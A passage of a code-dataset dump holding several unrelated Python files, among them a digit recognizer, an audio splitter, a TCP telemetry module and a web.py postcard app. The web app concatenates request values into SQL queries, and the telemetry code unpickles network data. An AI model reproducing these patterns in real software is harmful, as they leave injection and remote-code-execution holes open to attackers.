c\n\t\t\t\t\tdone = True\n\t\t\n\t\t# min row\n\t\tdone = False\n\t\tfor r in range(WIDTH):\n\t\t\tif done:\n\t\t\t\tbreak\n\t\t\tfor c in range(HEIGHT):\n\t\t\t\tif self.norm[r][c] == MARK:\n\t\t\t\t\trow[0] = r\n\t\t\t\t\tdone = True\n\t\t\n\t\t# max row\n\t\tdone = False\n\t\tfor r in range(WIDTH-1, -1, -1):\n\t\t\tif done:\n\t\t\t\tbreak\n\t\t\tfor c in range(HEIGHT):\n\t\t\t\tif self.norm[r][c] == MARK:\n\t\t\t\t\trow[1] = r\n\t\t\t\t\tdone = True\n\t\t\t\t\t\n\t\t# Get width\n\t\tresult = (col[1]-col[0]+1) / (row[1]-row[0]+1)\n\t\tself.features[\"WtoH\"] = result\n\t\treturn result\n\t\ndef to1D(row, col):\n\t'''\n\t\tConverts a row/column value to a 1 dimensional value based on WIDTH\n\t'''\n\treturn row * WIDTH + col\n\ndef main():\n\t'''\n\t\tMain program, reads in file and displays first few images to screen\n\t'''\n\timages = list()\n\t\n\t# Reads image data from file, LENGTH pixels per row each\n\tif input(\"Read new data (y/n)? \").lower()[0] == 'y':\n\t\tfilename = input(\"Input filename: \")\n\t\t\n\t\t# Get is training data. Training data has a leading value that is the\n\t\t# actual class for the image\n\t\ttrain = input(\"Training (y/n)? \").lower()[0] == 'y'\n\t\t\n\t\tmarkThreshold = input(\"Mark threshold 1 < 255: \")\n\n\t\timages = readFile(filename, int(markThreshold), training=train )\n\t\t\n\t\tif train:\n\t\t\timages = restrictValues(images)\n\t\t\t\n\t\t# Calculate features\n\t\tfor image in images:\n\t\t\timage.calculateFeatures()\n\telse:\n\t\timages = readFeatures(FEATURE_FILE)\n\t\t\t\n\t# Agglomerative clustering\n\tif input(\"Run agglomerative (y/n)? \").lower()[0] == 'y':\n\t\tclusters = agglomerative(images[:2000], k=20)\n\t\tfor key in clusters:\n\t\t\tcluster = clusters[key]\n\t\t\tprint(cluster)\n\t\t\tones = cluster.sums[AVAL]\n\t\t\tprint(\"1s: %i\\t0s: %i\\n\"%(ones, len(cluster.images)-ones))\n\t\n\t# Naive Bayes\n\tif input(\"Run Naive Bayes (y/n)? \").lower()[0] == 'y':\n\t\tresults = naiveBayes(images)\n\n\t# FLD\n\tif input(\"Run Fisher Linear Discriminant (y/n)? \").lower()[0] == 'y':\n\t\tfld = fisherLD(images)\n\t\n\t# View Images\n\tprint(\"Number of images:\", len(images))\n\ti = 0\n\twhile input(\"View next (y/n)? \").lower()[0] == 'y':\n\t\tprint(str(images[i]))\n\t\t\n\t\ti += 1\n\t\tif (i >= len(images)):\n\t\t\tbreak\n\t\n\t# Writes the image features to a file\n\tif input(\"Output features to file (y/n)? \").lower()[0] == 'y':\n\t\twriteToCSV(FEATURE_FILE, images)\n\t\t\ndef writeToCSV(filename, images):\n\t\"\"\"\n\t\tWrites the features of a list of images to a csv file\n\t\t\tfilename\t- the name of the file\n\t\t\timages\t\t- the list of image objects to write\n\t\"\"\"\n\t# Open and print headers\n\tf = open(filename, \"w\")\n\tprint(images[0].featureList(), file = f)\n\t\t\n\tfor image in images:\n\t\tprint(image.toCsvString(), file = f)\n\t\t\ndef readFeatures(filename):\n\t'''\n\t\tReads in a file and returns a list of image objects, these objects will\n\t\tnot have any values in the image field. All values are assumed to be\n\t\tfloats\n\t\t\tfilename - the file to read from\n\t'''\n\tnames = list()\n\timages = list()\n\tfirst = True\n\t\n\tfor line in open(filename):\n\t\tl = line.split(\",\")\n\t\tif first:\n\t\t\tfor i in range(len(l)):\n\t\t\t\tnames.append(l[i].strip())\n\t\t\tfirst = False\n\t\telse:\n\t\t\timages.append(Image())\n\t\t\tfor i in range(len(l)):\n\t\t\t\ttemp = float(l[i])\n\t\t\t\timages[-1].features[names[i]] = temp\n\t\t\t\n\treturn images\n\t\ndef readFile(filename, markThreshold, training=False):\n\t'''\n\t\tReads in a file and returns a list of image objects\n\t\t\tfilename - the file to read from\n\t\t\tmarkThreshold - the normalizing grayscale value\n\t\t\ttraining - true if first line of file contains value\n\t'''\n\timages = list()\n\ti = -1\n\t\n\tprint(\"Reading file...\", end='')\n\tsys.stdout.flush()\n\tfor line in open(filename):\n\t\tl = line.split(\",\")\n\t\tif l[0].isnumeric():\n\t\t\ti += 1\n\t\t\timages.append(Image())\n\t\t\tif training:\n\t\t\t\timages[i].actual = int(l[0])\n\t\t\t\n\t\t\tfor r in range(HEIGHT):\n\t\t\t\timages[i].orig.append(list())\n\t\t\t\timages[i].norm.append(list())\n\t\t\t\t\n\t\t\t\tfor c in range(WIDTH):\n\t\t\t\t\tindex = to1D(r, c)\n\t\t\t\t\tif training:\n\t\t\t\t\t\tindex += 1\n\t\t\t\t\t\n\t\t\t\t\tval = int(l[index])\n\t\t\t\t\tif int(val) > markThreshold:\n\t\t\t\t\t\timages[i].norm[r].append(MARK)\n\t\t\t\t\telse:\n\t\t\t\t\t\timages[i].norm[r].append(BLANK)\n\t\t\t\t\timages[i].orig[r].append(val)\n\t\t\t\t\t\n\tprint(\"Done\")\n\treturn images\n\ndef restrictValues(images, restriction=[0,1]):\n\t'''\n\t\tReturns subset of images whose values are in the restricted list\n\t'''\n\tsubset = list()\n\n\tfor image in images:\n\t\tif image.actual in restriction:\n\t\t\tsubset.append(image)\n\t\n\treturn subset\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"DigitRecognizer.py","file_name":"DigitRecognizer.py","file_ext":"py","file_size_in_byte":9764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"445387981","text":"import os\nfrom pathlib import Path\nimport auditok\n\n\n\ndef split_and_store(input_audio_file):\n\n input_audio=input_audio_file\n\n min_dur = 0.4 # minimum duration of a valid audio event in seconds\n max_dur = 8 # maximum duration of an event\n max_silence = 0.05 # maximum duration of tolerated continuous silence within an event\n energy_threshold = 50 # threshold of detection\n\n output_path =(\"audio_chunks_\" + \\\n \"_\" + str(min_dur) + \\\n \"_\" + str(max_dur) + \\\n \"_\" + str(max_silence) + \\\n \"_\" + str(energy_threshold))\n\n Path(output_path).mkdir(parents=True, exist_ok=True)\n\n audio_regions = auditok.split(\n input_audio,\n min_dur=min_dur, \n max_dur=max_dur, \n max_silence=max_silence, \n energy_threshold=energy_threshold\n )\n\n start_time_stamp=[]\n end_time_stamp=[]\n for i, r in enumerate(audio_regions):\n filename = r.save(os.path.join(output_path,f\"chunk{i}.wav\"))\n #print(\"region saved as: {}\".format(filename))\n start_time_stamp.append(r.meta.start)\n end_time_stamp.append(r.meta.end)\n\n\n return output_path,start_time_stamp,end_time_stamp\n ","sub_path":"generate_chunks.py","file_name":"generate_chunks.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"414913057","text":"import csv\n\nOUTDATED_KEYS = 'outdated_keys'\n\n\nclass ExportModel(object):\n @staticmethod\n def as_csv(file, queryset):\n \"\"\"\n 'file' (string: absolute path),\n 'queryset' a Django QuerySet instance,\n 'fields' a list or tuple of field model field names (strings)\n :returns (string) path to file\n \"\"\"\n fields = ['key', 'user_id'] + queryset.first().dataset.possible_labels + [OUTDATED_KEYS]\n nr_fields = len(fields)\n outdated_keys_index = fields.index(OUTDATED_KEYS)\n with open(file, 'w+') as f:\n writer = csv.writer(f)\n writer.writerow(fields)\n for obj in queryset:\n if not obj.key:\n continue\n\n row = [''] * nr_fields\n row[0] = obj.key\n row[1] = obj.user.id\n row[outdated_keys_index] = {}\n\n for k, v in obj.data.items():\n try:\n row[fields.index(k)] = v\n except ValueError:\n row[outdated_keys_index][k] = v\n\n row = list(map(lambda x: x if x != \"\" else False, row))\n writer.writerow(row)\n path = f.name\n return path\n","sub_path":"data_model/export_models.py","file_name":"export_models.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"362705405","text":"import time\r\nimport socket\r\nimport select\r\nimport struct\r\nimport pickle\r\nimport threading\r\nimport enum\r\n\r\nimport cv2\r\n\r\nclass DataType(enum.Enum):\r\n TELEM_RGB_IMAGE = 0\r\n TELEM_DEPTH_FRAME = 1\r\n TELEM_POSITION = 2\r\n TELEM_STATUS = 3\r\n\r\nclass airTelemetry():\r\n def __init__(self, hostname=''):\r\n self.telemInterface = tcpInterface(hostname=hostname)\r\n \r\n def start(self):\r\n self.telemThread = threading.Thread(target=self.telemInterface.startServer, name='Air_Telemetry')\r\n self.telemThread.daemon = True\r\n self.telemThread.start()\r\n\r\n def stop(self):\r\n self.telemInterface.close()\r\n \r\n def connected(self):\r\n if self.telemThread.isAlive() or not self.telemInterface.running:\r\n return False\r\n \r\n return True\r\n\r\n def sendImage(self, name, img):\r\n encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 50]\r\n data = cv2.imencode('.jpg', img, encode_param)[1]\r\n self.sendData(name, data)\r\n\r\n def sendData(self, name, data):\r\n if not self.connected():\r\n return\r\n \r\n try:\r\n self.telemInterface.sendData((name, data))\r\n \r\n # Start listen for new connections if socket closed\r\n except (BrokenPipeError, ConnectionResetError):\r\n self.telemInterface.close()\r\n self.start()\r\n\r\n\r\nclass tcpInterface():\r\n _PORT = 50006\r\n _MAX_READ_LEN = 60000\r\n _TIMEOUT = 1\r\n\r\n def __init__(self, hostname=''):\r\n self.hostname = hostname\r\n\r\n self.sockObj = None\r\n self.conn = None\r\n\r\n self.running = False\r\n\r\n pass\r\n \r\n def _createSocket(self):\r\n self.sockObj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.sockObj.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n self.sockObj.settimeout(2)\r\n\r\n def startServer(self):\r\n self.addr = (self.hostname, self._PORT)\r\n \r\n self._createSocket()\r\n self.sockObj.bind(self.addr)\r\n self.sockObj.listen()\r\n\r\n while True:\r\n # Wait for incoming connection\r\n try:\r\n self.conn, addr = self.sockObj.accept()\r\n print('Connected to: {}'.format(addr))\r\n\r\n except (BlockingIOError, socket.timeout):\r\n print('*** Waiting for connection ***')\r\n time.sleep(1)\r\n \r\n else:\r\n self.running = True\r\n return\r\n\r\n def close(self):\r\n if self.sockObj is not None:\r\n self.sockObj.close()\r\n \r\n if self.conn is not None:\r\n self.conn.close()\r\n\r\n print('*** Connection Closed ***')\r\n\r\n def startClient(self):\r\n self.addr = (self.hostname, self._PORT)\r\n\r\n while True:\r\n try:\r\n self._createSocket()\r\n self.sockObj.connect(self.addr)\r\n\r\n except (ConnectionRefusedError, socket.timeout):\r\n print('*** [61] Connection Refused ***')\r\n time.sleep(1)\r\n\r\n else:\r\n self.running = True\r\n print( '*** Telemetry Connected ***')\r\n return\r\n\r\n def sendData(self, data):\r\n byteData = pickle.dumps(data, protocol=pickle.HIGHEST_PROTOCOL)\r\n self.sendByteData(byteData)\r\n\r\n def sendByteData(self, byteData):\r\n try:\r\n writable = select.select([], [self.conn], [], self._TIMEOUT)[1]\r\n\r\n for conn in writable:\r\n msg = b'$' + struct.pack('>I', len(byteData)) + b':' + byteData\r\n conn.sendall(msg)\r\n\r\n except ValueError as e:\r\n if self.conn.fileno() == -1:\r\n raise BrokenPipeError\r\n else:\r\n print(e)\r\n\r\n except BrokenPipeError:\r\n self.conn.close()\r\n\r\n def readMsg(self):\r\n try:\r\n readable = select.select([self.sockObj], [], [], self._TIMEOUT)[0]\r\n\r\n for conn in readable:\r\n # Syncronize stream\r\n msg = conn.recv(1)\r\n while msg != b'$':\r\n msg = conn.recv(1)\r\n\r\n if msg == b'':\r\n return None\r\n\r\n # Get message length\r\n msg_len = struct.unpack('>I', conn.recv(4))[0]\r\n\r\n # Wait for all data to be returned\r\n if conn.recv(1) == b':':\r\n msg = b''\r\n while len(msg) < msg_len:\r\n\r\n bytesIn = msg_len - len(msg)\r\n if bytesIn > self._MAX_READ_LEN:\r\n bytesIn = self._MAX_READ_LEN\r\n\r\n try:\r\n msg += conn.recv(bytesIn)\r\n except BlockingIOError:\r\n time.sleep(0.1)\r\n \r\n data = pickle.loads(msg)\r\n return data\r\n\r\n except (ValueError):\r\n if self.sockObj.fileno() == -1:\r\n raise BrokenPipeError\r\n\r\n except (ConnectionResetError, socket.timeout):\r\n print( '*** Socket Closed ***' )\r\n self.close()\r\n\r\n return None\r\n\r\n\r\n#if __name__ == \"__main__\":\r\n# import threading\r\n\r\n# remoteTelem = airTelemetry()\r\n# remoteTelem.start()\r\n\r\n# while not remoteTelem.connected():\r\n# time.sleep(1)\r\n\r\n# testImage = cv2.imread('/Users/freddiesherratt/Desktop/ERL_SmartCities_2019/modules/test.jpg', 0)\r\n\r\n# totalTime = 0\r\n# loops = 5\r\n# for i in range(loops):\r\n# print(i+1)\r\n# startTime = time.time()\r\n# remoteTelem.sendImage(testImage)\r\n# totalTime += time.time() - startTime\r\n\r\n# print(totalTime/loops)\r\n\r\n# remoteTelem.stop()\r\n","sub_path":"Telemetry.py","file_name":"Telemetry.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"285123332","text":"__author__ = 'anonymous'\nfrom loader import Loader\nimport json\nclass ConfigLoader(Loader):\n\n def __init__(self,path,override=None):\n super().__init__(path,override)\n\n\n def get(self,val):\n if not val:\n raise ValueError(\"String seems to be empty\")\n path = [i for i in val.split('.') if i.strip()]\n config = self._config\n for p in path:\n if config:\n config = config.get(p)\n return json.dumps(config,indent=2,separators=(',',' == '))\n","sub_path":"Learning/Contests/HackerEarth/ChipMonk/config_loader.py","file_name":"config_loader.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"20254900","text":"# -*- mode: python; coding: utf-8 ; python-indent: 2 -*-\nimport sys\nimport os,sys\nimport eso_utils as ue\nimport of as player\n\nclass Logic:\n\tdef __init__(self, esono):\n\t\tself.esono = esono\n\t\tself.esono.logic = self\n\t\tself.player = None\n\t\tif self.esono.setplayer=='of':\n\t\t\tself.player = player.Player(esono=esono)\n\t\t\tself.esono.player = self.player\n\t\t\tself.AUTOPLAY = False # play next on\n\n\tdef stop(self, elt=None):\n\t\tself.player.stop(next=False)\n\t\t#self.esono.gui.cur_list.rm_tag('played')\n\n\tdef play_file_from_start(self, path):\n\t\tself.player.stop()\n\t\tself.player.play_file(path)\n\n\tdef load_file(self, path):\n\t\t#! check if file exists\n\t\t#! check if mimetype is supported\n\t\t# check if file already loaded\n\t\tif self.player.path == path: return True\n\t\tself.player.load(path)\n\t\treturn True\n\n\t# def play(self, path=''):\n\t# \tif not path: \n\t# \t\tself.player.play()\n\t# \t\treturn True\n\t# \tif not self.load(melt): return False\n\t# \tself.player.play()\n\t# \tself.AUTOPLAY = True\n\t# \treturn True\n\n\t# def play_from_start(self):\n\t# \tself.player.set_pos01(0.)\n\t# \tself.player.play()\n\t# \treturn True\n\n\t# def pause(self):\n\t# \tself.player.pause()\n\n\t# def play_pause(self, melt):\n\t# \tif not self.load(melt): return False\n\t# \tself.player.play_pause()\n\t# \tself.AUTOPLAY = True\n\t# \treturn True\n\n\tdef set_dur_sec(self, dur_sec):\n\t\t# self.melt_played.pjson.set_dur_sec(dur_sec)\n\t\tpass\n\n\tdef play_pos01(self, melt, pos01):\n\t\tif self.melt_played!= melt: self.play(melt)\n\t\tself.player.set_pos01(pos01)\n\t\treturn True\n\n\tdef pause_pos01(self, melt, pos01):\n\t\tif self.melt_played!= melt: self.load(melt)\n\t\tself.player.pause()\n\t\tself.player.set_pos01(pos01)\n\t\treturn True\n\n\tdef play_auto(self, sens):\n\t\tue.mezz('play_auto')\n\t\tif not self.AUTOPLAY: return\n\t\tmelt = self.melt_played\n\t\tif not melt in self.esono.mpaths: return\n\t\tmelts = self.esono.mpaths\n\t\tcl = self.esono.gui.cur_list\n\t\tid = melts.index(melt)\n\t\tif sens=='next':\n\t\t\tif cl.nl_selected>cl.nl_played: id = cl.nl_selected-1\n\t\t\telse:\n\t\t\t\tif id==len(melts)-1: id=0\n\t\t\t\telse: id+=1\n\t\telif sens=='prev':\n\t\t\tif id<0: id=len(melts)-1\n\t\t\telse: id-=1\n\t\tmelt = self.esono.mpaths[id]\n\t\tself.play_pause(melt)\n\t\tue.mezz(melt.name)\n\t\tcl.setline_played(id+1)\n","sub_path":"zzlogic.py","file_name":"zzlogic.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"583018125","text":"from logging import Formatter, getLogger, StreamHandler, DEBUG\nlogger = getLogger(__name__)\nhandler = StreamHandler()\nhandler.setLevel(DEBUG)\nhandler.setFormatter(Formatter(\"%(asctime)s- %(name)s - %(levelname)s - %(message)s\"))\nlogger.setLevel(DEBUG)\nlogger.addHandler(handler)\n\nimport requests\nimport json\nimport more_itertools\n\nclass BulkImportHandler(object):\n\n def __init__(self, model, contents):\n self.model = model\n self.model_name = model._meta.model_name\n self.model_fields = [field.name for field in model._meta.fields]\n self.contents = self._clean_bulk_contents(contents)\n\n def update(self, n=1000):\n self.model.objects.all().delete()\n for sublist in more_itertools.chunked([ self.model(**content) for content in self.contents ], n):\n self.model.objects.bulk_create(sublist)\n\n def _clean_bulk_contents(self, contents):\n return [ self._clean(pk+1, content) for pk, content in enumerate(contents) ]\n\n def _clean(self, pk, content):\n content = requests.structures.CaseInsensitiveDict(content)\n cleaned_content = dict()\n cleaned_content['pk'] = pk\n for field_name in self.model_fields:\n try:\n cleaned_content[field_name] = content[field_name]\n except KeyError:\n pass\n return cleaned_content\n","sub_path":"bulk_import_handler.py","file_name":"bulk_import_handler.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"39610175","text":"import os\n\nimport sae\nimport web\nimport random\nimport uuid\nimport json\n\ndb = web.database(dbn='mysql', port=int(sae.const.MYSQL_PORT), host=sae.const.MYSQL_HOST, db=sae.const.MYSQL_DB, user=sae.const.MYSQL_USER, pw=sae.const.MYSQL_PASS) \nrender = web.template.render('templates/')\n\nurls = (\n '/work/(.*)', 'Work',\n '/make/(.*)', 'Make',\n '/pic(.*)', 'Pic',\n '/video(.*)', 'Video',\n '/create(.*)', 'Create'\n)\n\nweb.config.debug = True\n\napp_root = os.path.dirname(__file__)\ntemplates_root = os.path.join(app_root, 'templates')\nrender = web.template.render(templates_root)\n\nclass Work:\n def GET(self, name):\n \n uri = web.ctx.path\n params = uri.split(\"/\")[2:]\n \n if web.cookies().get('redirect') != \"true\":\n web.setcookie(\"redirect\", \"true\", expires=24, domain=None, secure=False)\n raise web.seeother('/work/'+params[0]+'/'+params[1]+'/' + str(uuid.uuid4()))\n else:\n web.setcookie(\"redirect\", \"\", expires=24, domain=None, secure=False)\n \n creatorID = 0\n try:\n creatorID = int(params[0])\n except ValueError:\n creatorID = 0\n workID = 0\n try:\n workID = int(params[1])\n except ValueError:\n creatorID = 0\n imgID = 1\n msg = \"\"\n result = db.query(\"select `image_id` as iid, `text` from `work` where `work_id` = '\"+str(workID)+\"' and `creator_id` = '\"+str(creatorID)+\"'\")\n results = list(result)\n if len(results) == 0:\n imgID = 1\n else:\n imgID = int(results[0]['iid'])\n msg = results[0]['text']\n \n return render.work(str(imgID)+\".png\", str(imgID)+\"c.png\", msg)\n \n####### \n referer = web.ctx.env.get('HTTP_REFERER', '')\n host = web.ctx.homedomain\n ip = web.ctx.ip\n info[\"referer\"] = referer\n info[\"host\"] = host\n info[\"uri\"] = uri\n info[\"ip\"] = ip\n info[\"cookie\"] = web.cookies().get('redirect')\n if web.cookies().get('redirect') != \"true\":\n web.setcookie(\"redirect\", \"true\", expires=24, domain=None, secure=False)\n raise web.seeother('/work/'+info[\"param\"][0]+'/'+info[\"param\"][1]+'/' + str(uuid.uuid4()))\n else:\n web.setcookie(\"redirect\", \"\", expires=24, domain=None, secure=False)\n return render.test(info)\n\nclass Pic:\n def GET(self, name):\n return render.pic()\n\nclass Video:\n def GET(self, name):\n return render.video()\n\nclass Create:\n def POST(self, name):\n data = web.data()\n ds = data.split(\"&\");\n info = {\"img\":\"1\",\"qq\":\"0\",\"message\":\"Hello world.\"}\n for d in ds:\n s = d.split(\"=\")\n info[s[0]] = s[1]\n creatorID = 0\n result = db.query(\"select `creator_id` as id from creator where `qq`= '\"+info['qq']+\"'\") \n results = list(result)\n if len(results) <= 0:\n creatorID = db.insert('creator', qq=info['qq'])\n else:\n creatorID = results[0]['id']\n imageID = 1\n try:\n imageID = int(info['img'])\n except ValueError:\n imageID = 1\n if imageID < 1 or imageID > 8:\n imageID = 1\n workID = db.insert('work', image_id=str(imageID), text=info[\"message\"], creator_id=str(creatorID))\n web.setcookie(\"redirect\", \"true\", expires=24000, domain=None, secure=False)\n return json.dumps({\"creator_id\": str(creatorID), \"work_id\": str(workID), \"uuid\": str(uuid.uuid4())}, sort_keys=True)\n\nclass Make:\n def GET(self, name):\n uri = web.ctx.path\n strsp = uri.split(\"/\");\n imgID = 1\n try:\n imgID = int(strsp[2])\n except ValueError:\n imgID = 1\n return render.make(str(imgID)+\".png\", str(imgID)+\"c.png\")\n\napp = web.application(urls, globals()).wsgifunc()\n\napplication = sae.create_wsgi_app(app)","sub_path":"微信明信片722工程代码/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"47852062","text":"def piramide(x):\n\t\"\"\" 1\n\t\t2\t2\n\t\t3\t3\t3\"\"\"\n\tfor i in range(1,x+1):\n\t\tlst = [i]\n\t\tj = 1\t\t\t\n\t\twhile j < i:\n\t\t\tlst.append(i)\n\t\t\tj+=1\t\t\t\n\t\tprint (lst)\n\t\t\nx = int(input('Informe um numero: '))\npiramide(x)\n\t\t\t\n\t\n","sub_path":"matheus.tanaques/exerciciosComFuncoes/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"438971842","text":"import logging\n\nfrom django.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.core.urlresolvers import reverse_lazy\n\nfrom horizon import tables\nfrom horizon import messages\nfrom horizon import forms\n\nfrom openstack_auth_shib.models import Registration\nfrom openstack_auth_shib.models import Project\nfrom openstack_auth_shib.models import PrjRequest\n\nfrom openstack_auth_shib.models import PSTATUS_REG\nfrom openstack_auth_shib.models import PSTATUS_PENDING\nfrom openstack_auth_shib.models import PSTATUS_APPR\nfrom openstack_auth_shib.models import PSTATUS_REJ\n\nfrom .tables import SubscriptionTable\nfrom .forms import ApproveSubscrForm\n\nLOG = logging.getLogger(__name__)\n\nclass PrjReqItem:\n def __init__(self, prjReq):\n self.regid = prjReq.registration.regid\n self.username = prjReq.registration.username\n self.givenname = prjReq.registration.givenname\n self.sn = prjReq.registration.sn\n self.notes = prjReq.notes\n \n\nclass IndexView(tables.DataTableView):\n table_class = SubscriptionTable\n template_name = 'project/subscription_manager/subscr_manager.html'\n\n def get_data(self):\n \n reqList = list()\n \n try:\n #\n # TODO paging\n #\n curr_prjname = self.request.user.tenant_name\n q_args = {\n 'project__projectname' : curr_prjname,\n 'flowstatus' : PSTATUS_PENDING\n }\n for p_entry in PrjRequest.objects.filter(**q_args):\n reqList.append(PrjReqItem(p_entry))\n \n except Exception:\n messages.error(self.request, _('Unable to retrieve subscription list.'))\n\n return reqList\n\n\nclass ApproveView(forms.ModalFormView):\n form_class = ApproveSubscrForm\n template_name = 'project/subscription_manager/subscr_approve.html'\n success_url = reverse_lazy('horizon:project:subscription_manager:index')\n \n def get_object(self):\n if not hasattr(self, \"_object\"):\n try:\n\n regid = int(self.kwargs['regid'])\n curr_prjname = self.request.user.tenant_name\n q_args = {\n 'project__projectname' : curr_prjname,\n 'registration__regid' : regid\n }\n self._object = PrjReqItem(PrjRequest.objects.filter(**q_args)[0])\n \n except Exception:\n LOG.error(\"Subscription error\", exc_info=True)\n self._object = None\n\n return self._object\n\n def get_context_data(self, **kwargs):\n context = super(ApproveView, self).get_context_data(**kwargs)\n context['regid'] = int(self.kwargs['regid'])\n\n if not self.get_object():\n context['subscr_err'] = _(\"Cannot retrieve user's data from database.\")\n context['contacts'] = settings.MANAGERS\n \n return context\n\n def get_initial(self):\n \n if not self.get_object():\n return dict()\n \n return {\n 'regid' : self.get_object().regid,\n 'username' : self.get_object().username,\n 'givenname' : self.get_object().givenname,\n 'sn' : self.get_object().sn,\n 'notes' : self.get_object().notes\n }\n\n","sub_path":"src/subscription_manager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"145348840","text":"#!/usr/bin/python\r\nimport os, random\r\n\r\n\r\n\r\ndef parseLine( numExec, fo, line, separator, startTotal, endTotal, timeStep ):\r\n splittedLine = line.split(separator)\r\n # if id already registered we need to skip this part\r\n idSite = splittedLine[0]\r\n name = splittedLine[1]\r\n x = splittedLine[2]\r\n y = splittedLine[3]\r\n period = splittedLine[4]\r\n i = 5\r\n exist = 0\r\n #fo.write(idSite+separator+name+separator+x+separator+y+separator+period+separator)\r\n #Case A: site is multi-phased\r\n if int(period) == 13:\r\n numPhases = 0 #placeholder, need to make mulitphaseSites.csv\r\n phase = 1\r\n currentStep = startTotal\r\n fo.write(idSite+\"00\"+str(phase)+separator+name+separator+x+separator+y+separator+period+separator)\r\n \r\n print(\"Simulating multi-phased site: \" + str(name) + \", phase \" + str(phase) + \", for execution: \" + str(numExec+1) )\r\n print(\"Starting from time-step: \" + str(startTotal))\r\n \r\n for i in numPhases:\r\n for step in range (currentStep, endTotal, -timeStep):\r\n weight = float(splittedLine[i]) \r\n \r\n token = separator \r\n if step==endTotal+timeStep:\r\n token = '\\n'\r\n exist = 1\r\n fo.write(str(exist)+token) # Only the existence of a site is being investigated. It can be assumed that the site existed at least in the last step.\r\n else:\r\n if exist == 1:\r\n fo.write(str(exist)+token)\r\n else: \r\n if weight > 0.0:\r\n #print 'site: ' + name + ' contributing with weight: ' + str(weight) + ' to time step: ' + str(timeStep)\r\n if random.random() 0.0:\r\n #print 'site: ' + name + ' contributing with weight: ' + str(weight) + ' to time step: ' + str(timeStep)\r\n if random.random() maxLen): \r\n\r\n\t\t\t# for next count \r\n\t\t\ttotal = i \r\n\t\t\tnumPainters += 1\r\n\tprint(numPainters, \"num\")\r\n\treturn numPainters \r\n\r\ndef partition(arr, n, k): \r\n\tlo = max(arr) \r\n\thi = sum(arr) \r\n\r\n\twhile (lo < hi): \r\n\t\t\r\n\t\tmid = lo + (hi - lo) // 2\r\n\t\tprint(lo, mid, hi)\r\n\t\t\r\n\t\trequiredPainters = numberOfPainters(arr, n, mid) \r\n\r\n\t\t# find better optimum in lower half \r\n\t\t# here mid is included because we \r\n\t\t# may not get anything better \r\n\t\tif (requiredPainters <= k): \r\n\t\t\thi = mid \r\n\r\n\t\t# find better optimum in upper half \r\n\t\t# here mid is excluded because it gives \r\n\t\t# required Painters > k, which is invalid \r\n\t\telse: \r\n\t\t\tlo = mid + 1\r\n\r\n\t# required \r\n\treturn lo \r\n\r\n# Driver code \r\narr = [1, 2, 3, 4, 5, 6, 7, 8, 9] \r\nprint(sum(arr))\r\nn = len(arr) \r\nk = 2\r\nprint(int(partition(arr, n, k))) \r\n","sub_path":"(binary search appl.)painters_problem.py","file_name":"(binary search appl.)painters_problem.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"497225955","text":"import os\nimport pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\nfrom sklearn.model_selection import train_test_split\n\n\nnp.random.seed(42)\nPUNCTUATIONS = ['.', ',', '!', '?', ';', ':']\nPUNC_RATIO = 0.3\nHASH_VALUE_SUB = '@#$%@@#$%#'\nHASH_VALUE_OBJ = '&$^&#$%^#@'\nNUM_AUGS = [1, 2, 4]\nTRAIN_PATH = \"/opt/ml/dataset/train/train.csv\"\nDATASET_PATH = \"/opt/ml/dataset\"\n\n\ndef encode_words(sentence, start_s, end_s, start_o, end_o):\n '''\n entity를 HASH_VALUE로 대체, [start_idx:end_idx+1]까지의 글자를 바꿈\n '''\n if start_s > start_o:\n sentence = sentence[:start_s] + HASH_VALUE_SUB + sentence[end_s+1:]\n sentence = sentence[:start_o] + HASH_VALUE_OBJ + sentence[end_o+1:]\n else :\n sentence = sentence[:start_o] + HASH_VALUE_OBJ + sentence[end_o+1:]\n sentence = sentence[:start_s] + HASH_VALUE_SUB + sentence[end_s+1:] \n \n return sentence\n\n\ndef insert_punctuation(sentence, punc_ratio=PUNC_RATIO):\n '''\n ratio만큼 PUNCTATIONS를 sentence에 랜덤으로 추가\n '''\n words = sentence.split(' ')\n new_line = []\n q = np.random.randint(1, int(punc_ratio * len(words) + 1)) \n qs = np.random.choice(range(0, len(words)), q)\n \n for j, word in enumerate(words):\n if j in qs:\n new_line.append(PUNCTUATIONS[np.random.randint(0, len(PUNCTUATIONS) - 1)])\n new_line.append(word)\n else:\n new_line.append(word)\n new_line = ' '.join(new_line)\n\n return new_line\n\n\ndef change_index(sentence, word_s, word_o, len_s, len_o, type_s, type_o):\n '''\n 증강된 문장의 개체 index를 재설정\n '''\n sub_index = []\n obj_index = []\n\n sub_index.append(str(sentence.find(HASH_VALUE_SUB)))\n sub_index.append(str(sentence.find(HASH_VALUE_SUB) + len_s - 1))\n sentence = 